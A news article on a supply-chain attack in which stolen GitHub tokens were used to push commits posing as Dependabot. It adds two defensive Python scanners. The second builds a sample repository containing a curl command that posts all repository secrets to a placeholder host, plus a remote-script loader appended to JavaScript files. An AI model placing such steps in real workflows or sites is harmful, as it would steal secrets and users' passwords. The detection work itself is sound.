Hundreds of GitHub repositories have been targeted by a threat actor masquerading as GitHub's Dependabot feature to install password-stealing malware.

The threat actor targeted website projects on GitHub and was able to put the end users of those sites at risk with a crude impersonation of a trusted automated contributor.

Dependabot is GitHub's automated dependency-management tool. It scans a project's dependencies for known security vulnerabilities and outdated versions and opens pull requests proposing the version bumps, each with details of the change; maintainers then review and merge them.

Seeing Dependabot contributions in a GitHub project is common and there are a number of ways a genuine commit can be identified.

Dependabot has a distinctive blue avatar, which is displayed as a square image in commit logs; human GitHub users' avatars are displayed as circles. The account also carries a 'Bot' tag next to the 'dependabot' alias, a UI feature an ordinary user account cannot reproduce, and GitHub usernames cannot contain square brackets, so nobody can register 'dependabot[bot]' as a login.

The latest attack, investigated by researchers at Checkmarx, showed threat actors mimicking Dependabot by setting the author name recorded in their git commits to 'dependabot[bot]'. Git accepts any name and email address in a commit's author field, and because the forged address matched no GitHub account, the commits appeared with a blank avatar rather than Dependabot's blue one.

Researchers said this was likely enough to convince most users that a commit had been legitimately made by Dependabot and that it didn’t warrant a second look.

“This is the first incident [in which] we have witnessed a threat actor using fake git commits to disguise activity, knowing that many developers do not check the actual changes of Dependabot when they see it,” researchers said.

According to some of the affected users, GitHub personal access tokens (PATs) were stolen to gain access to projects. A PAT is presented in place of a password for Git over HTTPS and for the GitHub API, and a push made with one is not subject to an interactive multi-factor authentication prompt, so whoever holds the token holds the access.

After stealing these, the threat actor was able to act as the accounts that had access to the projects and push commits under the forged 'dependabot[bot]' author name, with the malicious code inside.
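The checks a maintainer can apply to tell a real Dependabot commit from a forged one, as an added example that is not code from the Checkmarx write-up or from GitHub. It works on commit objects in the shape the GitHub REST API returns from GET /repos/{owner}/{repo}/commits: the name and email written into the git commit sit under "commit.author" and are freely settable by whoever runs `git commit`; the GitHub account that email resolves to sits under "author" (null when it resolves to nothing, which is what produces the blank avatar); and the signature status sits under "commit.verification". The two sample commits are constructed for the example, and the noreply address on the genuine one is an assumption the checks do not rely on.

```python
"""Flag commits that claim to be Dependabot but do not check out."""
import json
import os
import urllib.request

# Assumption: genuine Dependabot commits are attributed to the app user
# "dependabot[bot]" (type "Bot") and are signed, so the API reports them verified.
DEPENDABOT_LOGIN = "dependabot[bot]"

SAMPLE_COMMITS = [
    {   # constructed: what a genuine Dependabot commit looks like in the API
        "sha": "1111111",
        "commit": {
            "author": {"name": "dependabot[bot]",
                       # assumed noreply address; the checks below do not rely on it
                       "email": "49699333+dependabot[bot]@users.noreply.github.com"},
            "message": "Bump lodash from 4.17.20 to 4.17.21",
            "verification": {"verified": True, "reason": "valid"},
        },
        "author": {"login": "dependabot[bot]", "type": "Bot"},
    },
    {   # constructed: a commit pushed with a stolen PAT and a forged author name
        "sha": "2222222",
        "commit": {
            "author": {"name": "dependabot[bot]", "email": "dependabot@nobody.invalid"},
            "message": "fix",
            "verification": {"verified": False, "reason": "unsigned"},
        },
        "author": None,   # the forged email maps to no GitHub account
    },
]


def assess_commit(commit):
    """Return the reasons a commit looks like a Dependabot impersonation.

    An empty list means the commit either does not claim to be Dependabot
    or passes every check (linked account is the bot, signature verified).
    """
    claimed = commit["commit"]["author"]["name"]
    if claimed != DEPENDABOT_LOGIN:
        return []
    reasons = []
    account = commit.get("author")
    if account is None:
        reasons.append("author email resolves to no GitHub account (blank avatar)")
    elif account.get("login") != DEPENDABOT_LOGIN or account.get("type") != "Bot":
        reasons.append("linked account is %r (%s), not the Dependabot app"
                       % (account.get("login"), account.get("type")))
    verification = commit["commit"].get("verification") or {}
    if not verification.get("verified"):
        reasons.append("signature not verified (%s)"
                       % verification.get("reason", "unknown"))
    return reasons


def find_impersonations(commits):
    """Map sha -> reasons for every commit that fails assess_commit."""
    flagged = {}
    for commit in commits:
        reasons = assess_commit(commit)
        if reasons:
            flagged[commit["sha"]] = reasons
    return flagged


def fetch_commits(owner, repo, token, per_page=100):
    """Pull recent commits for a real repository (network; not used offline)."""
    req = urllib.request.Request(
        "https://api.github.com/repos/%s/%s/commits?per_page=%d" % (owner, repo, per_page),
        headers={"Accept": "application/vnd.github+json",
                 "Authorization": "Bearer " + token})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


if __name__ == "__main__":
    commits = SAMPLE_COMMITS
    # Set REPO=owner/name and GITHUB_TOKEN to run against a live repository.
    if os.environ.get("GITHUB_TOKEN") and os.environ.get("REPO"):
        owner, repo = os.environ["REPO"].split("/", 1)
        commits = fetch_commits(owner, repo, os.environ["GITHUB_TOKEN"])
    for sha, reasons in find_impersonations(commits).items():
        print(sha, "->", "; ".join(reasons))
```

The important design choice is that the forged name itself is never trusted: a commit is judged by the account its email resolves to and by whether GitHub could verify a signature on it, which are the two things the attacker could not fake with a stolen token alone.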

Spoofing identities in attacks on GitHub projects

While the idea of forging commits on GitHub isn't new, researchers said this is the first time they've seen Dependabot itself spoofed in a dependency-poisoning attack. It has been known for well over a year that attackers can falsify commit dates to make an account appear more active than it really is, and spoof the identity of a contributor to poison GitHub projects, but the Dependabot tactic is a new one.

To make commits from a hijacked account detectable, GitHub offers commit signature verification: a developer signs commits with a GPG, SSH or S/MIME key registered to their account, and GitHub checks the signature and shows a green 'Verified' badge next to commits that pass, a badge an attacker cannot produce without the signing key. Checkmarx said the feature has limitations. Unsigned commits are not flagged in an overt way unless the user has enabled 'Vigilant Mode' in their profile, which adds an 'Unverified' badge; otherwise the protection relies on reviewers knowing what to look for and checking each commit manually.

Researchers said they aren't certain how the threat actor acquired developers' PATs, but they believe "the most likely scenario" is that the developer's computer was infected by a malicious open source package which stole the token and exfiltrated it to an attacker-controlled command and control (C2) server.

Once the threat actor was in control of the PATs, commits titled ‘fix’ were made to projects to install the password-stealing malware code.

Analysis showed this part of the attack was likely automated, since in most cases researchers observed the same two stages of code manipulation on each affected project.

The first added a new GitHub Actions workflow file called 'hook.yml' to the project. It reads the repository's secrets and variables and sends them to an attacker-controlled URL, and because it is triggered on push, it runs again with every subsequent code push.

The second stage tampered with every JavaScript file in the project. Every file with the '.js' extension had an obfuscated line of code appended to its end, so that whenever a page including that file was loaded in a web browser, a separate script was downloaded from a URL and executed.

Anything entered into web-based password forms from then on was intercepted and exfiltrated to the same attacker-controlled URL as the one used by the workflow file.
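A triage scanner for the two on-disk indicators of those stages, as an added example that is not code from the Checkmarx write-up. It is a heuristic: stage one is recognised as a workflow that serialises the whole secrets or variables context (`${{ toJSON(secrets) }}` is a real Actions expression, and legitimate workflows almost never dump every secret at once) and also contains an external URL; stage two as a trailing line that is appended verbatim to many '.js' files or that loads or evaluates remote code. The sample repository it builds under a temporary directory is constructed for the example, and its workflow and appended JavaScript only approximate the pattern described above (the real payload was obfuscated, and the 'collector.invalid' host is a placeholder).

```python
"""Scan a checked-out repository for a secret-exfiltrating workflow and for
an identical loader line appended to every JavaScript file."""
import os
import re
import tempfile
from collections import defaultdict

# Indicator 1: a workflow that dumps the whole secrets/vars context and
# contacts an external URL.
SECRET_DUMP = re.compile(r"toJSON\(\s*(secrets|vars)\s*\)")
URL = re.compile(r"https?://[^\s'\"]+")

# Indicator 2: trailing JavaScript that fetches or evaluates remote code.
JS_LOADER = re.compile(
    r"eval\(|Function\(|createElement\(['\"]script['\"]\)|\.src\s*=\s*['\"]https?://|atob\(|fromCharCode")

# Constructed stand-in for the appended line; the real one was obfuscated.
APPENDED = (";(function(){var s=document.createElement('script');"
            "s.src='https://collector.invalid/p.js';document.head.appendChild(s)})();")


def scan_workflows(root):
    """Return [(relative path, reasons)] for workflows matching indicator 1."""
    hits = []
    wf_dir = os.path.join(root, ".github", "workflows")
    if not os.path.isdir(wf_dir):
        return hits
    for name in sorted(os.listdir(wf_dir)):
        if not name.endswith((".yml", ".yaml")):
            continue
        path = os.path.join(wf_dir, name)
        with open(path, encoding="utf-8", errors="replace") as f:
            text = f.read()
        urls = sorted(set(URL.findall(text)))
        # Referencing one named secret is normal; dumping them all and sending
        # them somewhere is the combination worth a human look.
        if not (SECRET_DUMP.search(text) and urls):
            continue
        reasons = ["serialises the entire secrets/vars context",
                   "sends data to external URL(s): " + ", ".join(urls)]
        if re.search(r"^on:\s*\[?\s*push\b|^\s+push:", text, re.M):
            reasons.append("re-triggered on every push")
        hits.append((os.path.relpath(path, root), reasons))
    return hits


def scan_js_tails(root, min_files=3):
    """Return {tail line: [files]} for last lines that match indicator 2 or that
    appear verbatim at the end of at least `min_files` different .js files."""
    tails = defaultdict(list)
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in ("node_modules", ".git")]
        for fn in filenames:
            if not fn.endswith(".js"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as f:
                lines = [ln for ln in f.read().splitlines() if ln.strip()]
            if lines:
                tails[lines[-1].strip()].append(os.path.relpath(path, root))
    return {t: sorted(fs) for t, fs in tails.items()
            if len(fs) >= min_files or JS_LOADER.search(t)}


def build_sample_repo():
    """Create a constructed repository tree showing both stages; return its root."""
    root = tempfile.mkdtemp(prefix="triage-")

    def write(rel, text):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(text)

    # Benign workflow: uses one named secret, talks to no external URL.
    write(".github/workflows/ci.yml",
          "name: ci\non: [push]\njobs:\n  test:\n    runs-on: ubuntu-latest\n"
          "    steps:\n      - run: npm test\n        env:\n"
          "          TOKEN: ${{ secrets.NPM_TOKEN }}\n")
    # Constructed approximation of the stage-one workflow.
    write(".github/workflows/hook.yml",
          "name: hook\non: [push]\njobs:\n  run:\n    runs-on: ubuntu-latest\n"
          "    steps:\n      - run: curl -s -X POST --data-urlencode "
          "'s=${{ toJSON(secrets) }}' --data-urlencode 'v=${{ toJSON(vars) }}' "
          "https://collector.invalid/collect\n")
    # Stage two: the same line appended to every .js file, plus one untouched file.
    for name in ("src/app.js", "src/login.js", "public/main.js", "public/vendor/util.js"):
        write(name, "// original project code\nconsole.log('%s');\n%s\n" % (name, APPENDED))
    write("src/clean.js", "// untouched file\nconst app = {};\nexport default app;\n")
    return root


if __name__ == "__main__":
    repo = build_sample_repo()
    for path, reasons in scan_workflows(repo):
        print("WORKFLOW", path, "->", "; ".join(reasons))
    for tail, files in scan_js_tails(repo).items():
        print("JS TAIL in %d files: %s" % (len(files), tail[:60]))
```

Run it against a real checkout by replacing `build_sample_repo()` with the repository path. The cross-file test in `scan_js_tails` is the more durable of the two: an attacker can change the obfuscation, but appending the same payload to every JavaScript file leaves an identical tail across files that no normal codebase has.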

“This whole situation teaches us to be careful about where we get our code, even from trusted places like GitHub,” said Checkmarx. “It shows that even big platforms can have problems, so we need to always watch out and protect ourselves online.

“To make things safer, consider switching to GitHub’s fine-grained personal access tokens. These tokens allow you to reduce the risk of compromised tokens. So, if someone bad gets one of these keys, they can't do a lot of damage.

“The attacker's tactics, techniques, and procedures (TTPs) involve the use of fake commits, stealing user credentials, and impersonating Dependabot to avoid detection, [and] show us supply chain attacks are getting more sophisticated as attackers realize it doesn’t take much to move silently.”